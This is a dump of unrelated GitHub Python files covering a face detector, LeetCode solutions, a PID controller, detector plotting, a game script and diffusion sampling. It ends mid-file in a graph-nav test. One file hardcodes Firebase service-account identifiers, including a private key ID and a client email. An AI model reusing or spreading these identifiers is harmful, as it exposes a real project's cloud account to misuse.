result_frame)\n\n # avg_distance = (distance1 + distance2) / 2\n # if(avg_distance < distance_th):\n # cv2.rectangle(image_frame, (box[0], box[1]), (box[2], box[3]), color=(0,255,0))\n # else:\n # cv2.rectangle(image_frame, (box[0], box[1]), (box[2], box[3]), color=(0,0,255))\n\n p1[0] = p1[0].tolist()\n p1[1] = p1[1].tolist()\n p2[0] = p2[0].tolist()\n p2[1] = p2[1].tolist()\n return [p1, p2]\n \n # if there is no face\n return [(-1, -1), (-1, -1)]\n\n\nif __name__==\"__main__\":\n fd = FaceDetector()\n fd.check_face()\n while True:\n recv_data = fd.socket.recv()\n if not recv_data: # recv_data == None, So break\n continue \n \n video_cap = msgpack.unpackb(recv_data)\n\n send_image = fd.box_face(video_cap)\n\n fd.socket.send(send_image)\n\n time.sleep(1.0)\n\n fd.socket.close()\n\n","repo_name":"hy-kiera/wadjet","sub_path":"jetson/jetson/src/face_detector.py","file_name":"face_detector.py","file_ext":"py","file_size_in_byte":5940,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"3046523371","text":"import os\nimport json\n\n# Store firebase credentials into json\n\nfirebase_credentials = {\n \"type\": \"service_account\",\n \"project_id\": \"spoke-ops-tool\",\n \"private_key_id\": \"065e9681e3928b7f1103ac7a5f9ee94eb3285f5a\",\n \"client_email\": \"firebase-adminsdk-hj3b2@spoke-ops-tool.iam.gserviceaccount.com\",\n \"client_id\": \"107771288516978348519\",\n \"auth_uri\": \"https://accounts.google.com/o/oauth2/auth\",\n \"token_uri\": \"https://accounts.google.com/o/oauth2/token\",\n \"auth_provider_x509_cert_url\": \"https://www.googleapis.com/oauth2/v1/certs\",\n \"client_x509_cert_url\": \"https://www.googleapis.com/robot/v1/metadata/x509/firebase-adminsdk-hj3b2%40spoke-ops-tool.iam.gserviceaccount.com\"\n}\n\ndef load_firebase_credentials_into_json():\n\tcredentials = {}\n\n\tfirebase_private_key = os.environ.get(\"FIREBASE_PRIVATE_KEY\")\n\tfirebase_credentials['private_key'] = firebase_private_key.replace('\\\\n', '\\n')\n\n\twith open(os.path.expanduser('firebase-service-acc-creds.json'), 'w', encoding=\"utf-8\") as jsonfile:\n\t\tjsonfile.write(json.dumps(firebase_credentials, indent=\"\\t\"))","repo_name":"Spoke-Repair/Delivery-Back-End","sub_path":"authenticate.py","file_name":"authenticate.py","file_ext":"py","file_size_in_byte":1056,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"27615955916","text":"# 35. Search Insert Position\n# Easy\n# Array, Binary Search\n# https://leetcode.com/problems/search-insert-position\n#\n# Find the index where a target would be [left] inserted in an ordered list.\n# def searchInsert(self, nums: List[int], target: int) -> int:\n# Input: nums = [1,3,5,6], target = 5\n# Output: 2\n\nclass Solution:\n # Linear Search (Brute) | Time: O(n) | Space: O(1)\n def searchInsert(self, nums: list[int], target: int) -> int:\n for i, num in enumerate(nums):\n if num >= target:\n return i\n return len(nums)\n\n # Bisect Left | Time: O(log n) | Space: O(1)\n def searchInsert(self, nums: list[int], target: int) -> int:\n lo, hi = 0, len(nums)\n while lo < hi:\n mid = (lo + hi) // 2\n if nums[mid] < target:\n lo = mid + 1\n else:\n hi = mid\n return lo\n\n # bisect_left | Time: O(log n) | Space: O(1)\n def searchInsert(self, nums: list[int], target: int) -> int:\n from bisect import bisect_left\n return bisect_left(nums, target)\n","repo_name":"daviscvance/Practice","sub_path":"Leetcode/Python/bisection/easy/35-search-insert-position.py","file_name":"35-search-insert-position.py","file_ext":"py","file_size_in_byte":1083,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"12769251299","text":"from cmath import inf\nimport time\n\n\nclass PID:\n \"\"\"\n Implements a PID controller.\n \"\"\"\n\n def __init__(\n self, Kp: float, Ki: float, Kd: float, target: float, tau: float = 0\n ) -> None:\n \"\"\"\n\n Parameters\n ----------\n Kp : float\n Proportional gain.\n Ki : float\n Integration gain.\n Kd : float\n Derivative gain.\n tau : float\n Low pass filter time constant.\n target : float\n Target value.\n \"\"\"\n\n self.Kp = Kp\n self.Ki = Ki\n self.Kd = Kd\n self.tau = tau\n self.target = target\n self.Dterm = 0\n self.Iterm = 0\n self.last_error = 0\n self.last_time = time.time()\n self.last_feedback = 0\n self.last_output = 0\n self.set_limits(-inf, inf, -inf, inf)\n\n def set_limits(\n self, min: float = -inf, max: float = inf, min_int: float = -inf, max_int: float = inf\n ) -> None:\n \"\"\"\n Output limits.\n\n Parameters\n ----------\n min : float\n Minimum output.\n max : float\n Maximum output.\n \"\"\"\n self.max = max\n self.max_int = max_int\n self.min = min\n self.min_int = min_int\n\n def update(self, feedback: float) -> float:\n \"\"\"\n Calculate the PID output value.\n\n Parameters\n ----------\n feedback : float\n Value to be compared to the target.\n\n Returns\n -------\n float\n Output of the PID controller.\n \"\"\"\n error = self.target - feedback\n\n current_time = time.time()\n delta_time = current_time - self.last_time\n if delta_time == 0:\n print(\"-------------------------------------------------\")\n return self.last_output\n\n self.Pterm = self.Kp * error\n # self.Iterm += (error + self.last_error) * 0.5 * self.Ki * delta_time\n self.Iterm += error * self.Ki * delta_time\n # self.Dterm = -2 * self.Kd * (feedback - self.last_feedback) + (\n # 2 * self.tau - delta_time\n # ) * self.Dterm / (2 * self.tau + delta_time)\n self.Dterm = -self.Kd * (error - self.last_error) / delta_time\n\n if self.Iterm > self.max_int:\n self.Iterm = self.max_int\n elif self.Iterm < self.min_int:\n self.Iterm = self.min_int\n\n self.last_time = current_time\n self.last_error = error\n self.last_feedback = feedback\n\n print(f\"P: {self.Pterm}, I: {self.Iterm}, f: {feedback}\")\n\n output = self.Pterm + self.Iterm + self.Dterm\n if output < self.min:\n return self.min\n if output > self.max:\n return self.max\n self.last_output = output\n return output\n","repo_name":"robobe/rrbot_ws","sub_path":"src/rrbot_application/rrbot_application/pid_controller.py","file_name":"pid_controller.py","file_ext":"py","file_size_in_byte":2824,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"30136746778","text":"import unittest\nimport sys\nfrom pathlib import Path\nimport collections\nfrom random import randrange\n\n# Definition for a binary tree node.\nclass TreeNode(object):\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\n\nclass SolutionSorting:\n \"\"\"\n sorts the array, then iterates through until a missing number is found\n uses quicksort to sort\n\n runtime: quicksort -> O(n log(n))\n iterating through sorted array -> O(n)\n total: O(n log(n) + n) == O(n log(n))\n\n space complexity: O(1) -> in place sort\n \"\"\"\n\n def find_smallest_positive_int(self, nums):\n \"\"\"Finds the first missing positive integer in list.\n \n :type nums: list\n :rtype: int\n \"\"\"\n nums = self.quicksort(nums)\n\n smallest_positive = 1\n\n for num in nums:\n if num < 1:\n continue\n \n elif smallest_positive == num:\n smallest_positive += 1\n else:\n return smallest_positive\n\n return smallest_positive\n\n\n def quicksort(self, arr, left=None, right=None):\n if left is None: left = 0\n if right is None: right = len(arr)-1\n\n if left < right: \n\n pivot = self.partition(arr, left, right)\n\n left_arr = self.quicksort( arr, left, pivot-1 )\n right_arr = self.quicksort( arr, pivot+1, right)\n\n return arr\n\n def choose_pivot(self, arr):\n return len(arr)\n\n def partition(self, arr, left, right):\n pivot = arr[right]\n\n i = left - 1\n\n for j in range(left, right):\n\n if arr[j] <= pivot:\n i+=1\n arr[j], arr[i] = arr[i], arr[j]\n\n arr[right], arr[i+1] = arr[i+1], arr[right]\n\n return i+1\n\n\n\nclass SolutionHashing:\n \"\"\"\n iterates through array and adds each value into a hashtable\n then iterates through the hashtable, from 1 to the largest number in the array\n until a value not in the array is found. returns that value\n if loop finishes, the largest value + 1 is returned\n\n # runtime analysis: O(n + n) == O(n)\n # space complexity: O(n) -> creating a hashtable of the same size as the array\n \"\"\"\n \n def find_smallest_positive_int(self, nums):\n hashtable = {}\n largest_num = 1\n for num in nums:\n if num not in hashtable:\n hashtable[num] = True\n\n if num > largest_num:\n largest_num = num\n\n for i in range(1, largest_num):\n if i not in hashtable:\n return i\n\n return largest_num + 1\n\n\nclass SolutionOptimal:\n\n def find_smallest_positive_int(self, nums):\n shift, nums = self.segregate(nums)\n\n nums = nums[shift:]\n\n if len(nums) == 0: return 1\n if len(nums) == 1:\n if nums[0] == 1: return 2\n else: return 1\n\n largest_num = nums[0]\n for num in nums:\n if num > largest_num:\n largest_num = num\n\n\n indexes = [-1] * (len(nums)+1)\n\n for num in nums:\n if num < len(nums)+1 and num > 0:\n indexes[num] = 1\n\n # if we find an index thats negative, thats our missing number. return it\n for index in range(1, len(indexes)):\n if indexes[index] < 1:\n print (\"indexes at return\", indexes, len(indexes))\n return index\n\n # otherwise all indexes are present, so return the index + 1\n return index + 1\n\n\n # puts all non-positive \n # (0 and negative) numbers on left side of nums \n # return count of such numbers, new array, and largest number fount\n def segregate(self, nums):\n i = 0\n neg_count = 0\n for j in range (0, len(nums)):\n if nums[j] <= 0:\n nums[j], nums[i] = nums[i], nums[j]\n i +=1\n neg_count +=1\n # if nums[-2] < 1: neg_count +=1\n return neg_count, nums\n\n\n\nclass TestFindMissingSmallestPositive(unittest.TestCase):\n\n # sorting solution tests\n def test_sorting_solution_one(self):\n solution = SolutionSorting()\n self.assertEqual( solution.find_smallest_positive_int([2, 3, 7, 6, 8, -1, -10, 15]), 1 )\n\n def test_sorting_solution_two(self):\n solution = SolutionSorting()\n self.assertEqual( solution.find_smallest_positive_int([ 2, 3, -7, 6, 8, 1, -10, 15]), 4 )\n\n def test_sorting_solution_three(self):\n solution = SolutionSorting()\n self.assertEqual( solution.find_smallest_positive_int([3, 4, -1, 1]), 2 )\n\n def test_sorting_solution_four(self):\n solution = SolutionSorting()\n self.assertEqual( solution.find_smallest_positive_int([1, 2, 0]), 3 )\n\n # hashing solution tests\n def test_hashing_solution_one(self):\n solution = SolutionHashing()\n self.assertEqual( solution.find_smallest_positive_int([2, 3, 7, 6, 8, -1, -10, 15]), 1 )\n\n def test_hashing_solution_two(self):\n solution = SolutionHashing()\n self.assertEqual( solution.find_smallest_positive_int([ 2, 3, -7, 6, 8, 1, -10, 15]), 4 )\n\n def test_hashing_solution_three(self):\n solution = SolutionHashing()\n self.assertEqual( solution.find_smallest_positive_int([3, 4, -1, 1]), 2 )\n\n def test_hashing_solution_four(self):\n solution = SolutionHashing()\n self.assertEqual( solution.find_smallest_positive_int([1, 2, 0]), 3 )\n\n def test_optimal_solution_one(self):\n solution = SolutionOptimal()\n self.assertEqual( solution.find_smallest_positive_int([2, 3, 7, 6, 8, -1, -10, 15]), 1 )\n\n def test_optimal_solution_two(self):\n solution = SolutionOptimal()\n self.assertEqual( solution.find_smallest_positive_int([ 2, 3, -7, 6, 8, 1, -10, 15]), 4 )\n\n def test_optimal_solution_three(self):\n solution = SolutionOptimal()\n self.assertEqual( solution.find_smallest_positive_int([3, 4, -1, 1]), 2 )\n\n def test_optimal_solution_four(self):\n solution = SolutionOptimal()\n self.assertEqual( solution.find_smallest_positive_int([1, 2, 0]), 3 )\n \n def test_optimal_solution_five(self):\n solution = SolutionOptimal()\n self.assertEqual( solution.find_smallest_positive_int([-10,-3,-100,-1000,-239,1]), 2)\n\n def test_optimal_solution_six(self):\n solution = SolutionOptimal()\n self.assertEqual( solution.find_smallest_positive_int([-4,-5,0,-2,-6,-3,-6,8,4,-4]), 1)\n\n def test_optimal_solution_seven(self):\n solution = SolutionOptimal()\n self.assertEqual( solution.find_smallest_positive_int([1, 0]), 2)\n\n def test_optimal_solution_eight(self):\n solution = SolutionOptimal()\n self.assertEqual( solution.find_smallest_positive_int([1,1000]), 2)\n\n def test_optimal_solution_nine(self):\n solution = SolutionOptimal()\n self.assertEqual( solution.find_smallest_positive_int([2, 1]), 3)\n \n\n \n\nif __name__ == \"__main__\":\n file = Path(__file__).resolve()\n parent, top = file.parent, file.parents[2]\n\n sys.path.append(str(top))\n try:\n sys.path.remove(str(parent))\n except ValueError: # Already removed\n pass\n\n __package__ = 'TestFindMissingSmallestPositive.tests'\n\n unittest.main()","repo_name":"seb-patron/Algorithms-and-Data-Structures","sub_path":"Interview_Prep/daily_coding_problem/4.smallest_positive_number_missing/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":7346,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"32113315805","text":"from collections import deque\n\nimport numpy as np\nfrom scipy.stats import binned_statistic_2d\nimport pyqtgraph as pg\nfrom pyqtgraph.Qt import QtGui, QtWidgets\n\nfrom .timepix_setup_histogram import TimepixSetupHistogram\nfrom .ui.timepixsetupplotspanelui import Ui_DockWidget\n\n# ATTENTION! If the defined initial values below are equal to the initial values defined in the .ui file, the onChange\n# events are not triggered for initialization. Be carefull when changing the initial values here and check against those\n# in the .ui file!\nINITIAL_NUMBER_PACKETS = 10\nINITIAL_RANGE_TOF_MINIMUM = 0\nINITIAL_RANGE_TOF_MAXIMUM = 5\nINITIAL_RANGE_TOT_MINIMUM = 0\nINITIAL_RANGE_TOT_MAXIMUM = 1000\n\n# The bins for the histogram of the clustersize are constant. Therefor they are calculated only once.\nCLUSTER_SIZE_BINS = np.linspace(0, 400, 100, dtype=np.float64)\n\n\nclass TimepixSetupPlotsPanel(QtWidgets.QDockWidget, Ui_DockWidget):\n \"\"\"User interface to display some graphs and plots that are useful for setting up\n the timepix camera for experiments.\n\n The data displayed here can be aggregated for\n a specified number of packages. One package is the amount of information that is\n provided by the UDP sampler in a single packet. The size of a packet depends significantly\n on the datarate of the timepix camera and can vary heavily. For a lower datarate it is required\n to increase the number of integrated packets to get better statistics.\"\"\"\n\n def __init__(self, parent=None):\n super(TimepixSetupPlotsPanel, self).__init__(parent)\n\n # Set up the user interface from Designer.\n self.setupUi(self)\n\n self.__events_2d_hist_buffer = None\n\n self.__centroids_2d_hist_mean_buffer = None\n self.__centroids_2d_hist_max_buffer = None\n\n self.__tot_bins = None\n self.__tof_bins = None\n\n self.numberPacketsSpinBox.valueChanged.connect(self.onNumberPacketsChanged)\n self.toFRangeMinimumDoubleSpinBox.valueChanged.connect(\n self.toFRangeMinimumChanged\n )\n self.toFRangeMaximumDoubleSpinBox.valueChanged.connect(\n self.toFRangeMaximumChanged\n )\n self.toTRangeMinimumSpinBox.valueChanged.connect(self.toTRangeMinimumChanged)\n self.toTRangeMaximumSpinBox.valueChanged.connect(self.toTRangeMaximumChanged)\n self.pushButtonReset.clicked.connect(self.__reset_buffers)\n self.pushButtonSnapshot.clicked.connect(self.__snapshot)\n\n self.numberPacketsSpinBox.setValue(INITIAL_NUMBER_PACKETS)\n self.toFRangeMinimumDoubleSpinBox.setValue(INITIAL_RANGE_TOF_MINIMUM)\n self.toFRangeMaximumDoubleSpinBox.setValue(INITIAL_RANGE_TOF_MAXIMUM)\n self.toTRangeMinimumSpinBox.setValue(INITIAL_RANGE_TOT_MINIMUM)\n self.toTRangeMaximumSpinBox.setValue(INITIAL_RANGE_TOT_MAXIMUM)\n\n def setupUi(self, dock_widget):\n result = super().setupUi(dock_widget)\n\n # Event Data Plots Preparation\n self._event_data_tot_histogram = TimepixSetupHistogram(\n self.plt_event_data_histogram_tot, \"Count\", \"ToT (ns)\"\n )\n self.plt_event_data_2d_histogram_tof_tot = self.__setup_2d_hist_ui(\n \"plt_event_data_2d_histogram_tof_tot\", (2, 0), \"ToT\", \"ToF\"\n )\n self.plt_event_data_2d_histogram_x_y_tot = self.__setup_2d_hist_ui(\n \"plt_event_data_2d_histogram_tof_tot\", (3, 0), \"x (pixel)\", \"y (pixel)\"\n )\n self.plt_event_data_2d_histogram_x_y_tot.setPredefinedGradient('bipolar')\n\n # Centroided Data Plots Preparation\n self._centroided_data_mean_tot_histogram = TimepixSetupHistogram(\n self.plt_centroided_data_histogram_mean_tot, \"Count\", \"Mean ToT (ns)\"\n )\n\n self._centroided_data_max_tot_histogram = TimepixSetupHistogram(\n self.plt_centroided_data_histogram_max_tot, \"Count\", \"Max ToT (ns)\"\n )\n\n self.plt_centroided_data_2d_histogram_tof_mean_tot = self.__setup_2d_hist_ui(\n \"plt_centroided_data_2d_histogram_tof_mean_tot\", (2, 1), \"Mean ToT\", \"ToF\"\n )\n\n self.plt_centroided_data_2d_histogram_tof_max_tot = self.__setup_2d_hist_ui(\n \"plt_centroided_data_2d_histogram_tof_max_tot\", (2, 2), \"Max ToT\", \"ToF\"\n )\n\n self._centroided_data_cluster_size_histogram = TimepixSetupHistogram(\n self.plt_centroided_data_histogram_size, \"Count\", \"Cluster Size\", None\n )\n\n return result\n\n def __setup_2d_hist_ui(self, name, position, label_left, label_bottom):\n plt_2d_hist = pg.ImageView(view=pg.PlotItem())\n plt_2d_hist.setObjectName(name)\n self.gridLayout.addWidget(plt_2d_hist, position[0], position[1], 1, 1)\n\n plt_2d_hist.setPredefinedGradient(\"thermal\")\n plt_2d_hist.getView().setLabel(\"bottom\", text=label_left)\n plt_2d_hist.getView().setLabel(\"left\", text=label_bottom)\n plt_2d_hist.getView().invertY(False)\n plt_2d_hist.getView().setAspectLocked(False)\n\n return plt_2d_hist\n\n def onNumberPacketsChanged(self, number_packets):\n if number_packets == 0:\n number_packets = None\n self.pushButtonReset.setEnabled(True)\n else:\n self.pushButtonReset.setEnabled(False)\n self.__init_buffers(number_packets)\n\n def __init_buffers(self, number_packets=None):\n self._event_data_tot_histogram.init_buffer(number_packets)\n self.__events_2d_hist_buffer = deque(maxlen=number_packets)\n self.__events_2d_binnedstat_buffer = deque(maxlen=number_packets)\n\n self._centroided_data_mean_tot_histogram.init_buffer(number_packets)\n self._centroided_data_max_tot_histogram.init_buffer(number_packets)\n self.__centroids_2d_hist_mean_buffer = deque(maxlen=number_packets)\n self.__centroids_2d_hist_max_buffer = deque(maxlen=number_packets)\n self._centroided_data_cluster_size_histogram.init_buffer(number_packets)\n\n def __reset_buffers(self):\n self.__reset_tof_buffers()\n self.__reset_tot_buffers()\n\n def __reset_tof_buffers(self):\n if self.__events_2d_hist_buffer is not None:\n self.__events_2d_hist_buffer.clear()\n if self.__events_2d_binnedstat_buffer is not None:\n self.__events_2d_binnedstat_buffer.clear()\n if self.__centroids_2d_hist_mean_buffer is not None:\n self.__centroids_2d_hist_mean_buffer.clear()\n if self.__centroids_2d_hist_max_buffer is not None:\n self.__centroids_2d_hist_max_buffer.clear()\n\n def __reset_tot_buffers(self):\n self._event_data_tot_histogram.clear_buffer()\n if self.__events_2d_hist_buffer is not None:\n self.__events_2d_hist_buffer.clear()\n if self.__events_2d_binnedstat_buffer is not None:\n self.__events_2d_binnedstat_buffer.clear()\n\n self._centroided_data_mean_tot_histogram.clear_buffer()\n self._centroided_data_max_tot_histogram.clear_buffer()\n if self.__centroids_2d_hist_mean_buffer is not None:\n self.__centroids_2d_hist_mean_buffer.clear()\n if self.__centroids_2d_hist_max_buffer is not None:\n self.__centroids_2d_hist_max_buffer.clear()\n\n def __snapshot(self):\n self._event_data_tot_histogram.snapshot(self.__tot_bins)\n self._centroided_data_max_tot_histogram.snapshot(self.__tot_bins)\n self._centroided_data_mean_tot_histogram.snapshot(self.__tot_bins)\n self._centroided_data_cluster_size_histogram.snapshot(CLUSTER_SIZE_BINS)\n\n def toFRangeMinimumChanged(self, tof_range_minimum):\n self.tof_range_changed()\n tof_range_maximum = self.toFRangeMaximumDoubleSpinBox.value()\n if tof_range_maximum is not None:\n self.__update_bins_tof(tof_range_minimum, tof_range_maximum)\n\n def toFRangeMaximumChanged(self, tof_range_maximum):\n self.tof_range_changed()\n tof_range_minimum = self.toFRangeMinimumDoubleSpinBox.value()\n if tof_range_minimum is not None:\n self.__update_bins_tof(tof_range_minimum, tof_range_maximum)\n\n def toTRangeMinimumChanged(self, tot_range_minimum):\n self.tot_range_changed()\n tot_range_maximum = self.toTRangeMaximumSpinBox.value()\n if tot_range_maximum is not None:\n self.__update_bins_tot(tot_range_minimum, tot_range_maximum)\n\n def toTRangeMaximumChanged(self, tot_range_maximum):\n self.tot_range_changed()\n tot_range_minimum = self.toTRangeMinimumSpinBox.value()\n if tot_range_minimum is not None:\n self.__update_bins_tot(tot_range_minimum, tot_range_maximum)\n\n def tof_range_changed(self):\n self.__reset_tof_buffers()\n\n def tot_range_changed(self):\n self.__reset_tot_buffers()\n\n def __update_bins_tot(self, tot_min, tot_max):\n self.__tot_bins = range(tot_min, tot_max + 25, 25)\n\n def __update_bins_tof(self, tof_min, tof_max):\n self.__tof_bins = np.linspace(tof_min, tof_max, 50)\n\n def __update_events(self, tof, tot, x, y):\n self._event_data_tot_histogram.refresh(tot, np.array(self.__tot_bins))\n self.__plot_2d_histogram(\n tot,\n tof,\n (self.__tot_bins, self.__tof_bins),\n self.__events_2d_hist_buffer,\n self.plt_event_data_2d_histogram_tof_tot,\n )\n self.__plot_2d_binned_stat(\n x, y, tot,\n (range(256), range(256)),\n self.__events_2d_binnedstat_buffer,\n self.plt_event_data_2d_histogram_x_y_tot)\n\n def __update_centroids(self, tof, tot_mean, tot_max, cluster_size):\n # ToT (mean) histogram\n self._centroided_data_mean_tot_histogram.refresh(\n tot_mean, np.array(self.__tot_bins)\n )\n\n # ToF-ToT (mean) correlation\n self.__plot_2d_histogram(\n tot_mean,\n tof,\n (self.__tot_bins, self.__tof_bins),\n self.__centroids_2d_hist_mean_buffer,\n self.plt_centroided_data_2d_histogram_tof_mean_tot,\n )\n\n # ToT (max) histogram\n self._centroided_data_max_tot_histogram.refresh(\n tot_max, np.array(self.__tot_bins)\n )\n\n # ToF-ToT (max) correlation\n self.__plot_2d_histogram(\n tot_max,\n tof,\n (self.__tot_bins, self.__tof_bins),\n self.__centroids_2d_hist_max_buffer,\n self.plt_centroided_data_2d_histogram_tof_max_tot,\n )\n\n # Cluster size histogram\n self._centroided_data_cluster_size_histogram.refresh(\n cluster_size, CLUSTER_SIZE_BINS\n )\n\n def __plot_2d_histogram(self, data_x, data_y, bins, buffer, plt):\n image = np.histogram2d(data_x, data_y * 1e6, bins=bins)[0]\n buffer.append(image)\n\n img = sum(buffer)\n\n x0, x1 = (bins[0][0], bins[0][-1])\n y0, y1 = (bins[1][0], bins[1][-1])\n xscale = (x1 - x0) / img.shape[0]\n yscale = (y1 - y0) / img.shape[1]\n plt.setImage(\n img / img.max(),\n scale=[xscale, yscale / 1000],\n pos=[x0, y0 / 1000],\n autoRange=False,\n autoLevels=False,\n autoHistogramRange=False,\n )\n\n def __plot_2d_binned_stat(self, data_x, data_y, data_z, bins, buffer, plt):\n image, x_bins, y_bins, _ = binned_statistic_2d(\n data_x, data_y, data_z, bins=(range(256), range(256)))\n buffer.append(np.nan_to_num(image))\n\n img = np.mean(buffer, axis=0)\n\n x0, x1 = (x_bins[0], x_bins[-1])\n y0, y1 = (y_bins[0], y_bins[-1])\n xscale = (x1 - x0) / img.shape[0]\n yscale = (y1 - y0) / img.shape[1]\n plt.setImage(\n img,\n scale=[xscale, yscale],\n pos=[x0, y0],\n autoRange=False,\n autoLevels=False,\n autoHistogramRange=False,\n )\n\n def on_event(self, events):\n self.__update_events(events[3], events[4], events[1], events[2])\n\n def on_centroid(self, centroids):\n self.__update_centroids(centroids[3], centroids[4], centroids[5], centroids[6])\n","repo_name":"CFEL-CMI/pymepix-viewer","sub_path":"pymepixviewer/panels/timepixsetupplotspanel.py","file_name":"timepixsetupplotspanel.py","file_ext":"py","file_size_in_byte":12080,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"61"} +{"seq_id":"16766236280","text":"import sys\n\nsys.stdin = open(\"input.txt\")\n\nt = int(input())\n\nfor tc in range(1, t + 1):\n arr = list(map(int, input().split()))\n n = 10\n result = 0 # 결과값 초기화 (0 or 1 로 나와야함)\n for i in range(1, 1<공집합 제외\n total = 0\n for j in range(n):\n if i & (1< 1:\n potencia = velocidad * 10 / distancia\n else:\n # angulo = cuerpo_celeste.angulo_con(self)\n potencia = velocidad * 12\n else:\n angulo = cuerpo_celeste.angulo_con(self)\n potencia = 0\n\n potencia = self.__esperar_a_angulo(angulo, potencia)\n\n juego.enviar_datos(angulo, potencia)\n\n def frenar(self):\n angulo = self.velocidad.inverse.rotation_deg()\n potencia = 6\n potencia = self.__esperar_a_angulo(angulo, potencia)\n juego.enviar_datos(angulo, potencia)\n\n # def frenar_orbita(self, cuerpo_celeste: CuerpoCeleste, vel_orbital):\n # if vel_orbital > 0:\n # angulo = cuerpo_celeste.angulo_con(self) - 90\n # potencia = 2\n # elif vel_orbital < 0:\n # angulo = cuerpo_celeste.angulo_con(self) + 90\n # potencia = 2\n # else:\n # angulo = self.angulo\n # potencia = 0\n #\n # potencia = self.__esperar_a_angulo(angulo, potencia)\n #\n # juego.enviar_datos(angulo, potencia)\n\n def velocidad_orbital_con(self, cuerpo_celeste: CuerpoCeleste, ult_ang) -> float:\n return cuerpo_celeste.angulo_con(self) - ult_ang\n\n def ir_a_cuerpo_celeste(self, cuerpo_celeste: CuerpoCeleste):\n angulo = self.angulo_con(cuerpo_celeste)\n if self.velocidad.module < 1 or self.velocidad.validate_angle_deg_with(self.direccion_a(cuerpo_celeste), 30):\n potencia = 1.5\n else:\n potencia = 1\n # potencia = self.__esperar_a_angulo(angulo, potencia)\n juego.enviar_datos(angulo, potencia)\n\n def despegar_de(self, cuerpo_celeste: CuerpoCeleste):\n angulo = cuerpo_celeste.angulo_con(self)\n if self.velocidad.module < 1 or self.velocidad.validate_angle_deg_with(self.direccion_a(cuerpo_celeste), 160):\n potencia = 6.5\n else:\n potencia = 1\n potencia = self.__esperar_a_angulo(angulo, potencia)\n juego.enviar_datos(angulo, potencia)\n\n def __esperar_a_angulo(self, angulo, potencia):\n return potencia if abs(self.angulo - angulo) < 10 else 0\n","repo_name":"AlberLC/rocket-training","sub_path":"Assets/ScriptsExternos/nave.py","file_name":"nave.py","file_ext":"py","file_size_in_byte":2884,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"71010073796","text":"import argparse\nimport importlib\nfrom v_diffusion import make_beta_schedule\nfrom moving_average import init_ema_model\nfrom torch.utils.tensorboard import SummaryWriter\nfrom copy import deepcopy\nimport torch\nimport os\nfrom train_utils import make_visualization\nimport cv2\n\n\ndef make_argument_parser():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--module\", help=\"Model module.\", type=str, required=True)\n parser.add_argument(\"--checkpoint\", help=\"Path to checkpoint.\", type=str, default=\"\")\n parser.add_argument(\"--out_file\", help=\"Path to image.\", type=str, default=\"\")\n parser.add_argument(\"--batch_size\", help=\"Batch size.\", type=int, default=1)\n parser.add_argument(\"--diffusion\", help=\"Diffusion model.\", type=str, default=\"GaussianDiffusion\")\n parser.add_argument(\"--time_scale\", help=\"Diffusion time scale.\", type=int, default=1)\n parser.add_argument(\"--clipped_sampling\", help=\"Use clipped sampling mode.\", type=bool, default=False)\n parser.add_argument(\"--clipping_value\", help=\"Noise clipping value.\", type=float, default=1.2)\n parser.add_argument(\"--eta\", help=\"Amount of random noise in clipping sampling mode(recommended non-zero values only for not distilled model).\", type=float, default=0)\n return parser\n\ndef sample_images_5000(args, make_model):\n device = torch.device(\"cuda\")\n\n teacher_ema = make_model().to(device)\n\n def make_diffusion(args, model, n_timestep, time_scale, device):\n betas = make_beta_schedule(\"cosine\", cosine_s=8e-3, n_timestep=n_timestep).to(device)\n M = importlib.import_module(\"v_diffusion\")\n D = getattr(M, args.diffusion) # 什么类型的diffusion?\n sampler = \"ddpm\"\n if args.clipped_sampling:\n sampler = \"clipped\"\n return D(model, betas, time_scale=time_scale, sampler=sampler)\n\n teacher = make_model().to(device) # teacher是一个UNet对象,还不是diffusion对象\n\n ckpt = torch.load(args.checkpoint) # 载入checkpoint\n teacher.load_state_dict(ckpt[\"G\"]) # G是所有的模型参数\n n_timesteps = ckpt[\"n_timesteps\"]//args.time_scale # n_timesteps是采样步长数\n time_scale = ckpt[\"time_scale\"]*args.time_scale # 一个时间步长的大小\n del ckpt # 参数传完,删掉\n print(\"Model loaded.\")\n\n teacher_diffusion = make_diffusion(args, teacher, n_timesteps, time_scale, device) # 这是一个diffusion对象\n image_size = deepcopy(teacher.image_size)\n image_size[0] = 1\n \n for i in range(10):\n print(f\"{i+1}/5000\")\n img = make_visualization(teacher_diffusion, device, image_size, need_tqdm=True, eta=args.eta, clip_value=args.clipping_value)\n if img.shape[2] == 1:\n img = img[:, :, 0]\n filename = os.path.join(\"images/celeba/base_0\", f\"celeba_full_0_{i:04}.png\")\n cv2.imwrite(filename, img)\n\n print(\"Finished.\")\n\nparser = make_argument_parser() # 创建一个ArgumentParser对象\n\nargs = parser.parse_args() # 解析parser对象中的命令行参数,参数存在args对象中\n\nM = importlib.import_module(args.module) # 导入命令行参数module指定的模块\nmake_model = getattr(M, \"make_model\") # 从celeba_u.py中获取make_model属性,里面定义了网络的架构\n\nsample_images_5000(args, make_model) # 把其他命令行参数和celeba_u对应的网络架构相关的参数传入采样函数\n","repo_name":"DannieSYD/Diffusion_Distillation","sub_path":"sample_5000.py","file_name":"sample_5000.py","file_ext":"py","file_size_in_byte":3379,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"13035641993","text":"import concurrent\n\nimport grpc\nimport pytest\n\nimport bosdyn.client.graph_nav\nfrom bosdyn.api import header_pb2, lease_pb2, time_sync_pb2\nfrom bosdyn.api.graph_nav import graph_nav_pb2, graph_nav_service_pb2_grpc, map_pb2, nav_pb2\nfrom bosdyn.client.exceptions import InternalServerError, UnsetStatusError\nfrom bosdyn.client.graph_nav import GraphNavClient, UnrecognizedCommandError\nfrom bosdyn.client.time_sync import TimeSyncEndpoint\n\n\nclass 